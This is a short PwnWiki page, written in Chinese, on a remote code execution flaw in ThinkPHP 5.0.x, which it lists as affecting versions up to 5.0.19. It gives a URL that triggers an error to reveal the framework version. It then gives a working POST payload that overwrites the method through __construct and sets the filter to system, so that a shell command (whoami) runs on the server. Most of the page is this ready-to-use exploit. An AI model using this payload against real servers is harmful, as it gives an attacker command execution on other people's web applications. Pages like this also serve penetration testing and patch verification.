ThinkPHP 5.0.13 代碼執行漏洞

From PwnWiki
Revision as of 12:47, 3 July 2021 by Pwnwiki (talk | contribs) (Created page with "<languages /> <translate> ==影響版本== </translate> ThinkPHP <= v5.0.19 <translate> ==漏洞利用== </translate> <translate> 通過報錯確定ThinkPHP版本: </trans...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:

影響版本

ThinkPHP <= v5.0.19

漏洞利用

通過報錯確定ThinkPHP版本:

http://127.0.0.1/tk5/public/index.php/111

Payload

http://127.0.0.1/tk5/public/index.php

post發送數據:

s=whoami&_method=__construct&method=&filter[]=system